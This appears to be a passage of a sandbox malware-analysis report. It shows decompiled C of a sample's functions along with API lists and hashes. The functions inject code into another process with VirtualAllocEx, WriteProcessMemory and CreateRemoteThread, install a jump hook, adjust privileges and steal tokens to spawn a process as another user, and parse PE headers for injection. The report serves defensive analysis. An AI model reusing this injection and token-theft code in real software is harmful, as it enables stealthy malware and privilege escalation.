				 *(_t206 + 0x88) = CreateEventW(0, 0, 0, 0);
				 *(_t206 + 0x8c) = CreateEventW(0, 0, 0, 0);
				 *(_t206 + 0x90) = CreateEventW(0, 1, 1, 0);
				 *((intOrPtr*)(_t206 + 0x70)) = _a4;
				_v456 = _a8;
				 *((intOrPtr*)(_t206 + 0x74)) = _a8;
				if(DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x88), _a4,  &_v436, 0, 0, 2) == 0 || DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x8c), _a4,  &_v432, 0, 0, 2) == 0 || DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x90), _a4,  &_v428, 0, 0, 2) == 0) {
					L23:
					_t197 = _v444;
					if(_t197 == 0) {
						CloseHandle( *(_t206 + 0x88));
						CloseHandle( *(_t206 + 0x8c));
						CloseHandle( *(_t206 + 0x90));
						if(_v436 != 0) {
							DuplicateHandle(_a4, _v436, GetCurrentProcess(), 0, 0, 0, 3);
						}
						if(_v432 != 0) {
							DuplicateHandle(_a4, _v432, GetCurrentProcess(), 0, 0, 0, 3);
						}
						if( *(_t206 + 0x90) != 0) {
							DuplicateHandle(_a4, _v428, GetCurrentProcess(), 0, 0, 0, 3);
						}
						if(_v452 != 0) {
							VirtualFreeEx(_a4, _v452, E005CA3A0(), 0x8000);
						}
						_t120 = _v448;
						_t207 = _t206 + 0x88;
						if(_t120 != 0) {
							VirtualFreeEx(_a4, _t120, 0x70, 0x8000);
						}
						 *((intOrPtr*)(_t207 + 0x10)) = 0;
						 *((intOrPtr*)(_t207 + 0xc)) = 0;
						 *((intOrPtr*)(_t207 + 8)) = 0;
						 *((intOrPtr*)(_t207 + 4)) = 0;
						 *_t207 = 0;
						_t197 = _v444;
					}
					goto L35;
				} else {
					_t136 = VirtualAllocEx(_a4, 0, E005CA3A0(), 0x3000, 0x40);
					_v452 = _t136;
					if(_t136 == 0) {
						goto L23;
					}
					_t180 = E005CA3A0();
					_t187 = _t213;
					 *_t187 = 0;
					if(WriteProcessMemory(_a4, _v452, E005CA290, _t180, _t187) == 0 || _v460 != _t180) {
						goto L23;
					} else {
						_t181 =  &_v316;
						 *((intOrPtr*)(_t181 - 0x4c)) = 0;
						 *((intOrPtr*)(_t181 - 0x48)) = 0;
						 *((intOrPtr*)(_t181 - 0x24)) = 0;
						E005D4520(_t181, 0x56);
						_t142 = GetModuleHandleW(_t181);
						_t211 =  &_v116;
						 *(_t181 - 8) = _t142;
						E005D7160(_t211, 0x6e);
						 *((intOrPtr*)(_t181 - 0x6c)) = GetProcAddress( *(_t181 - 8), _t211);
						E005D7160(_t211, 0x6f);
						 *((intOrPtr*)(_t181 - 0x68)) = GetProcAddress( *(_t181 - 8), _t211);
						E005D7160(_t211, 0x70);
						 *((intOrPtr*)(_t181 - 0x64)) = GetProcAddress( *(_t181 - 8), _t211);
						E005D7160(_t211, 0x71);
						 *((intOrPtr*)(_t181 - 0x60)) = GetProcAddress( *(_t181 - 8), _t211);
						E005D7160(_t211, 0x72);
						 *((intOrPtr*)(_t181 - 0x5c)) = GetProcAddress( *(_t181 - 8), _t211);
						E005D7160(_t211, 0x73);
						 *((intOrPtr*)(_t181 - 0x50)) = GetProcAddress( *(_t181 - 8), _t211);
						E005D7160(_t211, 0x74);
						 *((intOrPtr*)(_t181 - 0x58)) = GetProcAddress( *(_t181 - 8), _t211);
						E005D7160(_t211, 0x75);
						 *((intOrPtr*)(_t181 - 0x54)) = GetProcAddress( *(_t181 - 8), _t211);
						_t204 =  &(_t213[0x12]);
						if( *((intOrPtr*)(_t181 - 0x6c)) == 0 || _v420 == 0 || _v416 == 0 || _v412 == 0) {
							goto L23;
						} else {
							_t163 = VirtualAllocEx(_a4, 0, 0x70, 0x3000, 0x40);
							_v448 = _t163;
							if(_t163 == 0) {
								goto L23;
							}
							_v460 = 0;
							if(WriteProcessMemory(_a4, _t163,  &_v436, 0x70, _t204) == 0 || _v460 != 0x70) {
								goto L23;
							} else {
								_t165 = E005D1800(_a4);
								_v444 = _t165;
								if(_t165 == 0) {
									goto L23;
								}
								if( *((intOrPtr*)(_t206 + 0x78)) == 0) {
									_t167 = CreateRemoteThread(_a4, 0, 0, _v452, _v448, 4, 0);
									_v460 = _t167;
									if(_t167 == 0) {
										goto L23;
									}
									L20:
									ResetEvent( *(_t206 + 0x8c));
									ResetEvent( *(_t206 + 0x88));
									if(ResumeThread(_v460) != 0 && E005CB710(_t170, _t206) != 0) {
										 *((intOrPtr*)(_t206 + 0x94)) = _v452;
										_t173 = _v456;
										 *((intOrPtr*)(_t206 + 0x98)) = _t173;
										 *((intOrPtr*)(_t206 + 0x9c)) = _t173 +  ~E005CA290 + E005CA350;
										 *((intOrPtr*)(_t206 + 0x7c)) = 1;
										_v448 = 1;
									}
									goto L23;
								}
								_v320 = _t211;
								_v116 = 0x6858;
								_v112 = 0xe9500000;
								_v460 = 0;
								_v114 = _v448;
								_v108 = _v452 + 0xfffffff4 - _t165;
								if(WriteProcessMemory(_a4, _t165, _t211, 0xc, _t204) == 0 || _v460 != 0xc) {
									goto L23;
								} else {
									goto L20;
								}
							}
						}
					}
				}
			}

0x005c125a
0x005c125c
0x005c1269
0x005c126e
0x005c1274
0x005c170a
0x005c1716
0x005c1716
0x005c128f
0x005c129b
0x005c12aa
0x005c12b7
0x005c12be
0x005c12c9
0x005c12ee
0x005c1612
0x005c1612
0x005c1618
0x005c162a
0x005c1632
0x005c163a
0x005c1641
0x005c165c
0x005c165c
0x005c1667
0x005c1682
0x005c1682
0x005c168f
0x005c16aa
0x005c16aa
0x005c16b5
0x005c16cd
0x005c16cd
0x005c16d3
0x005c16d7
0x005c16df
0x005c16f0
0x005c16f0
0x005c16f8
0x005c16fb
0x005c16fe
0x005c1701
0x005c1704
0x005c1706
0x005c1706
0x00000000
0x005c134e
0x005c1364
0x005c136c
0x005c1370
0x00000000
0x00000000
0x005c137b
0x005c1381
0x005c1383
0x005c13a0
0x00000000
0x005c13af
0x005c13b1
0x005c13b8
0x005c13bb
0x005c13be
0x005c13c4
0x005c13cd
0x005c13d3
0x005c13da
0x005c13e0
0x005c13f4
0x005c13fa
0x005c1408
0x005c140e
0x005c141c
0x005c1422
0x005c1430
0x005c1436
0x005c1444
0x005c144a
0x005c1458
0x005c145e
0x005c146c
0x005c1472
0x005c1480
0x005c1485
0x005c148a
0x00000000
0x005c14b4
0x005c14c6
0x005c14ce
0x005c14d2
0x00000000
0x00000000
0x005c14d8
0x005c14f7
0x00000000
0x005c1507
0x005c150e
0x005c1515
0x005c1519
0x00000000
0x00000000
0x005c1523
0x005c15a3
0x005c15ab
0x005c15af
0x00000000
0x00000000
0x005c15b1
0x005c15bd
0x005c15c5
0x005c15d3
0x005c15eb
0x005c15f1
0x005c15f5
0x005c1602
0x005c160b
0x005c160e
0x005c160e
0x00000000
0x005c15d3
0x005c1525
0x005c152c
0x005c1537
0x005c1542
0x005c1554
0x005c155d
0x005c1578
0x00000000
0x00000000
0x00000000
0x00000000
0x005c1578
0x005c14f7
0x005c148a
0x005c13a0

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005C128D
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005C1299
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 005C12A8
GetCurrentProcess.KERNEL32 ref: 005C12D2
DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 005C12E6
GetCurrentProcess.KERNEL32 ref: 005C12FE
DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 005C1312
GetCurrentProcess.KERNEL32 ref: 005C132A
DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 005C1340
VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 005C1364
WriteProcessMemory.KERNEL32(?,?,005CA290,00000000), ref: 005C1398
GetModuleHandleW.KERNEL32(?), ref: 005C13CD
GetProcAddress.KERNEL32(?,?), ref: 005C13F2
GetProcAddress.KERNEL32(?,?), ref: 005C1406
GetProcAddress.KERNEL32(?,?), ref: 005C141A
GetProcAddress.KERNEL32(?,?), ref: 005C142E
GetProcAddress.KERNEL32(?,?), ref: 005C1442
GetProcAddress.KERNEL32(?,?), ref: 005C1456
GetProcAddress.KERNEL32(?,?), ref: 005C146A
GetProcAddress.KERNEL32(?,?), ref: 005C147E
VirtualAllocEx.KERNEL32(?,00000000,00000070,00003000,00000040), ref: 005C14C6
WriteProcessMemory.KERNEL32(?,00000000,?,00000070), ref: 005C14EF

Part of subcall function 005D1800: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 005D181C
Part of subcall function 005D1800: ReadProcessMemory.KERNEL32(?,?,?,00000010,?), ref: 005D1842
Part of subcall function 005D1800: ReadProcessMemory.KERNEL32(?,?,?,00000040,?), ref: 005D1869
Part of subcall function 005D1800: ReadProcessMemory.KERNEL32(?,?,?,000000F8), ref: 005D1893

WriteProcessMemory.KERNEL32(?,00000000,?,0000000C), ref: 005C1570
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,00000000), ref: 005C15A3
ResetEvent.KERNEL32(?), ref: 005C15BD
ResetEvent.KERNEL32(?), ref: 005C15C5
ResumeThread.KERNEL32(?), ref: 005C15CB
CloseHandle.KERNEL32(?), ref: 005C162A
CloseHandle.KERNEL32(?), ref: 005C1632
CloseHandle.KERNEL32(?), ref: 005C163A
GetCurrentProcess.KERNEL32 ref: 005C1643
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 005C165C
GetCurrentProcess.KERNEL32 ref: 005C1669
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 005C1682
GetCurrentProcess.KERNEL32 ref: 005C1691
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 005C16AA
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005C16CD
VirtualFreeEx.KERNEL32(?,?,00000070,00008000), ref: 005C16F0

Strings

p, xrefs: 005C14FD
Xh, xrefs: 005C152C

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Process$Handle$AddressProc$CurrentDuplicateMemory$Event$CreateVirtual$CloseReadWrite$AllocFreeResetThread$InformationModuleQueryRemoteResume
String ID: Xh$p
API String ID: 2079587854-3369398867
Opcode ID: 6f5026677acd8818881c87ac95d310dc1344d443946ef31a695a6adf6a69ad7e
Instruction ID: 3e2805271dc62772223d12e78becf41ea65fb8528127dfc8d108301f615aca20
Opcode Fuzzy Hash: 6f5026677acd8818881c87ac95d310dc1344d443946ef31a695a6adf6a69ad7e
Instruction Fuzzy Hash: BFD14870504344AFEB21AF65CC49F6BBBE9FF85340F14482EB98996261EB71AC44DB21

Uniqueness

Uniqueness Score: -1.00%

Function 005C5470, Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 350
processmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E005C5470(intOrPtr _a20) {
				int _v0;
				long _v28;
				WCHAR* _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				char _v552;
				short _v1064;
				char _v1240;
				char _v1272;
				void _v1316;
				void* _v1320;
				struct _STARTUPINFOW _v1428;
				union _SID_NAME_USE _v1444;
				long _v1448;
				long _v1452;
				long _v1456;
				long _v1460;
				long _v1464;
				long _v1468;
				long _v1472;
				char _v1476;
				intOrPtr _v1480;
				struct _SID_IDENTIFIER_AUTHORITY _v1484;
				long _v1488;
				char _v1492;
				long _v1496;
				void* _v1500;
				long _v1504;
				void* _v1508;
				void* _v1512;
				void* _v1516;
				void* _v1520;
				long _v1524;
				intOrPtr _v1528;
				void* _v1532;
				char _v1536;
				void* _v1540;
				void* _v1544;
				void* _v1548;
				intOrPtr _v1556;
				void* _v1568;
				int _t95;
				intOrPtr _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t107;
				int _t110;
				int _t112;
				int _t114;
				long _t115;
				void** _t116;
				int _t117;
				DWORD* _t118;
				int _t119;
				int _t120;
				int _t122;
				int _t125;
				int _t128;
				int _t130;
				int _t131;
				int _t132;
				void* _t134;
				struct _TOKEN_PRIVILEGES* _t147;
				DWORD* _t150;
				WCHAR* _t151;
				char* _t152;
				struct _STARTUPINFOW* _t153;
				int _t155;
				long _t158;
				int _t164;
				intOrPtr _t168;
				signed int _t174;
				void* _t176;
				void** _t178;
				WCHAR* _t179;
				union _SECURITY_IMPERSONATION_LEVEL _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				void* _t186;
				void* _t187;
				HANDLE* _t189;
				void* _t191;

				_t189 =  &_v1508;
				_t168 =  *0x5d9a8c; // 0x0
				_t180 = 0;
				_t153 =  &(_v1428.dwFlags);
				_v1516 = 0xffffffff;
				_v1484.Value = 0x100;
				_v1524 = 0;
				_v1504 = 0;
				_v1508 = 0;
				_v1492 = 0;
				_v1520 = 0;
				_v1512 = 0;
				_v1496 = 0;
				_v1472 = 0;
				_t153->cb = 0x44;
				_v1476 =  *0x5d9a90 & 0x0000ffff;
				_v1480 = _t168;
				GetStartupInfoW(_t153);
				_t191 =  *0x5d9c00 - _t180; // 0x0
				_v1456 = 0;
				_v1460 = 0;
				_v1464 = 0;
				_v1468 = 0;
				if(_t191 != 0 || E005D18C0(_t153, _t191) != 0) {
					_t181 = _a20;
					_v1488 = 0;
					if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v1520) != 0) {
						_t179 =  &_v1240;
						E005D4520(_t179, 0x5f);
						_t189 =  &(_t189[2]);
						if(LookupPrivilegeValueW(0, _t179,  &(_v1428.dwXCountChars)) != 0) {
							_t147 =  &(_v1428.dwYSize);
							_t147->PrivilegeCount = 1;
							_t147->Privileges[0].Luid = 2;
							AdjustTokenPrivileges(_v1520, 0, _t147, 0x10,  &(_v1428.lpTitle),  &_v1488);
						}
					}
					if(_t181 == 0) {
						_t95 =  *0x5d9c4c; // 0x0
						__eflags = _t95;
						if(_t95 == 0) {
							L24:
							_t155 =  *0x5d9b80; // 0x0
							__eflags = _t155;
							if(_t155 == 0) {
								L42:
								_t180 = 0;
								_t187 = 0;
								_t178 = 0;
								__eflags = 0;
								L43:
								_t96 = _v1428.lpReserved;
								if(_t96 != 0) {
									 *0x5d9e90(_v1524, _t96);
								}
								_t97 = _v1524;
								if(_t97 != 0) {
									CloseHandle(_t97);
								}
								_t98 = _v1504;
								if(_t98 != 0) {
									 *0x5d9e88(_t98);
								}
								if(_t178 != 0) {
									E005C91E0(_t187);
								}
								_t99 = _v1520;
								if(_t99 != 0) {
									AdjustTokenPrivileges(_t99, 0,  &(_v1428.lpTitle), 0x10, 0, 0);
									CloseHandle(_v1520);
								}
								goto L53;
							}
							_t107 =  *_t155();
							_t182 = _t107;
							__eflags = _t107 - 0xffffffff;
							if(_t107 == 0xffffffff) {
								goto L42;
							}
							L26:
							RevertToSelf();
							_t110 =  *0x5d9c00(_t182,  &_v1516);
							L27:
							__eflags = _t110;
							if(_t110 == 0) {
								goto L42;
							}
							_t180 = 1;
							_t112 = DuplicateTokenEx(_v1524, 0x2000000, 0, 1, 1, _t189);
							__eflags = _t112;
							if(_t112 == 0) {
								goto L42;
							}
							CloseHandle(_v1532);
							_t150 =  &_v1516;
							 *_t150 = 0;
							_t114 = GetTokenInformation(_v1540, 1, 0, 0, _t150);
							__eflags = _t114;
							_t178 = 0;
							if(_t114 == 0) {
								_t115 = GetLastError();
								__eflags = _t115 - 0x7a;
								if(_t115 != 0x7a) {
									goto L42;
								}
								_t116 = E005C3180(_v1520, 0);
								_t189 =  &(_t189[2]);
								_t178 = _t116;
								__eflags = _t116;
								if(_t116 == 0) {
									L11:
									_t180 = 0;
									_t187 = 0;
									goto L43;
								}
								_t187 = _t178;
							}
							_t117 = GetTokenInformation(_v1544, 1, _t187, _v1520, _t150);
							__eflags = _t117;
							if(_t117 == 0) {
								L38:
								_t180 = 0;
								goto L43;
							}
							_t118 =  &_v1508;
							_t151 =  &_v552;
							_v1064 = 0;
							 *_t118 = 0x100;
							 *_t151 = 0;
							_t119 = LookupAccountSidW(0,  *_t178, _t151, _t118,  &_v1064, _t118,  &_v1444);
							__eflags = _t119;
							if(_t119 == 0) {
								goto L38;
							}
							_t120 = _v0;
							_t158 = 0;
							_v1448 = 0;
							_v1452 = 0;
							_v1456 = 0;
							_v1460 = 0;
							_v1464 = 0;
							_v1472 = 0;
							_v1476 = 0x20;
							_v1468 = _t151;
							__eflags = _t120;
							if(_t120 == 0) {
								L34:
								_t122 =  *0x5d9e84(_v1548,  &_v1476);
								__eflags = _t122;
								if(_t122 == 0) {
									goto L38;
								}
								_v1428.hStdOutput = 0;
								_t152 =  &_v1272;
								E005D4520(_t152, 0x9d);
								_t189 =  &(_t189[2]);
								_v1428.dwY = _t152;
								_t125 =  *0x5d9e8c( &_v1536, _v1556, 0);
								__eflags = _t125;
								if(_t125 == 0) {
									goto L38;
								}
								_t128 = CreateProcessAsUserW(_v1568, 0, _v32, 0, 0, 0, _v28, _v1548, 0,  &_v1428,  &_v1512);
								__eflags = _t128;
								if(_t128 == 0) {
									goto L38;
								}
								 *_v40 = _v1512;
								 *_v36 = _v1508;
								goto L43;
							} else {
								goto L33;
							}
							do {
								L33:
								_t174 =  *(_t189 + _t158 + 0x3e4) & 0x0000ffff;
								 *(_t120 + _t158) = _t174;
								_t158 = _t158 + 2;
								__eflags = _t174;
							} while (_t174 != 0);
							goto L34;
						}
						_t130 =  *_t95(0, 0, 1,  &_v1508,  &_v1492);
						__eflags = _t130;
						if(_t130 == 0) {
							goto L24;
						}
						_t131 = _v1512;
						_t182 = 0xffffffffffffffff;
						__eflags = _t131;
						if(_t131 == 0) {
							L21:
							_t132 =  *0x5d9be8; // 0x0
							__eflags = _t132;
							if(_t132 != 0) {
								 *_t132(_v1528);
							}
							__eflags = _t182 - 0xffffffff;
							if(_t182 != 0xffffffff) {
								goto L26;
							} else {
								goto L24;
							}
						}
						_t176 = 0;
						_t164 = _v1528 + 8;
						__eflags = _t164;
						while(1) {
							__eflags =  *_t164;
							if( *_t164 == 0) {
								break;
							}
							_t176 = _t176 + 1;
							_t164 = _t164 + 0xc;
							__eflags = _t176 - _t131;
							if(_t176 < _t131) {
								continue;
							}
							goto L21;
						}
						_t182 =  *((intOrPtr*)(_t164 - 8));
						goto L21;
					}
					_t134 = OpenProcess(0x1fffff, 0,  *(_t181 + 4));
					if(_t134 == 0) {
						goto L42;
					}
					_t186 = _t134;
					if(OpenProcessToken(_t186, 8,  &_v1512) == 0 || GetTokenInformation(_v1512, 1,  &_v1316, 0x4c,  &_v1472) == 0) {
						goto L42;
					} else {
						_t178 = 0;
						if(AllocateAndInitializeSid( &_v1484, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v1500) == 0 || EqualSid(_v1320, _v1500) == 0) {
							CloseHandle(_v1516);
							_t110 = OpenProcessToken(_t186, 2,  &_v1520);
							goto L27;
						} else {
							goto L11;
						}
					}
				} else {
					L53:
					return _t180;
				}
			}

0x005c5474
0x005c5481
0x005c5487
0x005c5489
0x005c5490
0x005c5498
0x005c54a0
0x005c54a3
0x005c54a7
0x005c54ab
0x005c54af
0x005c54b3
0x005c54b7
0x005c54bb
0x005c54bf
0x005c54c5
0x005c54ca
0x005c54cf
0x005c54d5
0x005c54db
0x005c54df
0x005c54e3
0x005c54e7
0x005c54eb
0x005c54fa
0x005c5501
0x005c551f
0x005c5521
0x005c552b
0x005c5530
0x005c5546
0x005c5548
0x005c5554
0x005c555a
0x005c556c
0x005c556c
0x005c5546
0x005c5574
0x005c560c
0x005c5611
0x005c5613
0x005c567f
0x005c567f
0x005c5685
0x005c5687
0x005c5871
0x005c5871
0x005c5873
0x005c5875
0x005c5875
0x005c5877
0x005c5877
0x005c587d
0x005c5884
0x005c5884
0x005c588a
0x005c588f
0x005c5892
0x005c5892
0x005c5898
0x005c589e
0x005c58a1
0x005c58a1
0x005c58a9
0x005c58ac
0x005c58b1
0x005c58b4
0x005c58ba
0x005c58c9
0x005c58d3
0x005c58d3
0x00000000
0x005c58ba
0x005c568d
0x005c568f
0x005c5691
0x005c5694
0x00000000
0x00000000
0x005c569a
0x005c569a
0x005c56a6
0x005c56ac
0x005c56ac
0x005c56ae
0x00000000
0x00000000
0x005c56b8
0x005c56c7
0x005c56cd
0x005c56cf
0x00000000
0x00000000
0x005c56d9
0x005c56e1
0x005c56e5
0x005c56f0
0x005c56f6
0x005c56f8
0x005c56fd
0x005c5847
0x005c584d
0x005c5850
0x00000000
0x00000000
0x005c5858
0x005c585d
0x005c5860
0x005c5862
0x005c5864
0x005c5603
0x005c5603
0x005c5605
0x00000000
0x005c5605
0x005c586a
0x005c586a
0x005c570f
0x005c5715
0x005c5717
0x005c5843
0x005c5843
0x00000000
0x005c5843
0x005c5726
0x005c572a
0x005c5731
0x005c5737
0x005c573d
0x005c574e
0x005c5754
0x005c5756
0x00000000
0x00000000
0x005c575c
0x005c5763
0x005c5765
0x005c5769
0x005c576d
0x005c5771
0x005c5775
0x005c5779
0x005c577d
0x005c5785
0x005c5789
0x005c578b
0x005c57a1
0x005c57aa
0x005c57b0
0x005c57b2
0x00000000
0x00000000
0x005c57b8
0x005c57c2
0x005c57cf
0x005c57d4
0x005c57d7
0x005c57e9
0x005c57ef
0x005c57f1
0x00000000
0x00000000
0x005c581d
0x005c5823
0x005c5825
0x00000000
0x00000000
0x005c5839
0x005c583f
0x00000000
0x00000000
0x00000000
0x00000000
0x005c578d
0x005c578d
0x005c578d
0x005c5795
0x005c5799
0x005c579c
0x005c579c
0x00000000
0x005c578d
0x005c5625
0x005c5627
0x005c5629
0x00000000
0x00000000
0x005c562b
0x005c5631
0x005c5632
0x005c5634
0x005c566b
0x005c566b
0x005c5670
0x005c5672
0x005c5678
0x005c5678
0x005c567a
0x005c567d
0x00000000
0x00000000
0x00000000
0x00000000
0x005c567d
0x005c563a
0x005c563c
0x005c563c
0x005c563f
0x005c563f
0x005c5642
0x00000000
0x00000000
0x005c5644
0x005c5645
0x005c5648
0x005c564a
0x00000000
0x00000000
0x00000000
0x005c564c
0x005c5668
0x00000000
0x005c5668
0x005c5584
0x005c558c
0x00000000
0x00000000
0x005c5592
0x005c55a4
0x00000000
0x005c55cd
0x005c55d1
0x005c55ec
0x005c5652
0x005c5660
0x00000000
0x00000000
0x00000000
0x00000000
0x005c55ec
0x005c58d9
0x005c58d9
0x005c58e5
0x005c58e5

APIs

GetStartupInfoW.KERNEL32(?), ref: 005C54CF
GetCurrentProcess.KERNEL32 ref: 005C5509
OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 005C5517
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005C553E
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?), ref: 005C556C
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 005C5584
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 005C559C
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 005C55BF
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005C55E4
EqualSid.ADVAPI32(?,?), ref: 005C55F9
CloseHandle.KERNEL32(?), ref: 005C5892

Part of subcall function 005D18C0: LoadLibraryW.KERNEL32(?), ref: 005D18DC
Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D18FD
Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1911
Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1925
Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1939

CloseHandle.KERNEL32(?), ref: 005C5652
OpenProcessToken.ADVAPI32(00000000,00000002,FFFFFFFF), ref: 005C5660
RevertToSelf.ADVAPI32 ref: 005C569A
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001), ref: 005C56C7
CloseHandle.KERNEL32(FFFFFFFF), ref: 005C56D9
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 005C56F0
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 005C570F
LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 005C574E
CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 005C581D
GetLastError.KERNEL32 ref: 005C5847
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 005C58C9
CloseHandle.KERNEL32(?), ref: 005C58D3

Strings

, xrefs: 005C577D

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Token$Process$AddressCloseHandleOpenProc$Information$AdjustLookupPrivileges$AccountAllocateCreateCurrentDuplicateEqualErrorInfoInitializeLastLibraryLoadPrivilegeRevertSelfStartupUserValue
String ID:
API String ID: 896487261-3916222277
Opcode ID: 7ae8917d6282dc76ba18f15cbd61882e87f3f130793ba6a2d2a007abbd6f25a9
Instruction ID: 2afed350e58df66ef7dd29f9c2e941a11cc6145fa99ddbaec9dc49e673f64805
Opcode Fuzzy Hash: 7ae8917d6282dc76ba18f15cbd61882e87f3f130793ba6a2d2a007abbd6f25a9
Instruction Fuzzy Hash: 12C15C70209701AFE7219FA0DC48F6BBBE9FF84740F10491EF585962A0EB71E944DB62

Uniqueness

Uniqueness Score: -1.00%

Function 005D0920, Relevance: 24.6, APIs: 16, Instructions: 640
injectionmemorystringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E005D0920(void* __ecx, void* __eflags) {
				void* _v16;
				long _v128;
				void* _v132;
				long _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long* _v156;
				long _v160;
				char _v164;
				signed short* _v168;
				long _v172;
				void* _v176;
				intOrPtr _v180;
				long* _v184;
				long _v192;
				void _v196;
				void _v200;
				long _v204;
				intOrPtr _v208;
				long* _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				long _v232;
				intOrPtr _v236;
				long _v240;
				void* _v244;
				void* _v248;
				void* _v252;
				void* _v256;
				long _v260;
				long _v264;
				long _v268;
				long _v272;
				intOrPtr _v276;
				void* _v280;
				void* _v284;
				long _v288;
				long _v292;
				long _v296;
				intOrPtr _t299;
				void* _t300;
				void* _t302;
				intOrPtr _t312;
				long _t316;
				long _t317;
				long _t318;
				long* _t321;
				intOrPtr _t322;
				void* _t323;
				unsigned int _t326;
				intOrPtr _t327;
				long _t328;
				long _t337;
				signed int _t338;
				long _t342;
				long _t346;
				long _t350;
				long _t352;
				long _t354;
				long _t357;
				long _t359;
				long _t360;
				long* _t361;
				long _t362;
				signed int _t363;
				long _t364;
				intOrPtr _t367;
				void* _t368;
				long _t369;
				signed short* _t370;
				unsigned int _t372;
				intOrPtr* _t374;
				intOrPtr _t383;
				void* _t385;
				long _t390;
				void* _t394;
				long* _t395;
				long _t397;
				void* _t398;
				long _t401;
				long _t404;
				long _t426;
				long* _t430;
				long _t431;
				long** _t434;
				long _t437;
				long _t448;
				long _t449;
				void* _t464;
				void* _t467;
				SIZE_T* _t469;
				intOrPtr _t471;
				long _t473;
				intOrPtr _t476;
				intOrPtr* _t480;
				intOrPtr _t481;
				long _t483;
				long _t486;
				intOrPtr _t487;
				long _t488;
				long _t490;
				long _t491;
				void* _t493;
				long* _t495;
				long _t496;
				void* _t497;
				signed int _t499;
				void _t501;
				void _t504;
				long _t506;
				long _t507;
				void* _t508;
				signed int _t509;
				void* _t512;
				void* _t514;

				_t508 = __ecx;
				_t486 = 0;
				E005D6610( &_v280, 0, 0x100);
				_t512 = (_t509 & 0xfffffff8) - 0x118 + 0xc;
				if( *((intOrPtr*)(_t508 + 0x80)) != 0) {
					L26:
					return _t486;
				}
				E005D7C90( *(_t508 + 0x60),  *((intOrPtr*)(_t508 + 0x64)));
				_t514 = _t512 + 8;
				_t394 =  *(_t508 + 0x60);
				_v280 = _t394;
				if(( *_t394 & 0x0000ffff) != 0x5a4d) {
					L21:
					_t529 =  *((intOrPtr*)(_t508 + 0x80));
					if( *((intOrPtr*)(_t508 + 0x80)) == 0) {
						E005D5320(_t508, _t529);
					}
					L23:
					_t295 = _v244;
					if(_v244 != 0) {
						E005C91E0(_t295);
						_t514 = _t514 + 4;
					}
					E005D7C90( *(_t508 + 0x60),  *((intOrPtr*)(_t508 + 0x64)));
					_t486 =  *((intOrPtr*)(_t508 + 0x5c));
					goto L26;
				}
				_t299 =  *((intOrPtr*)(_t394 + 0x3c));
				_t487 = _t394 + _t299;
				_v276 = _t487;
				if( *((intOrPtr*)(_t394 + _t299)) != 0x4550) {
					goto L21;
				}
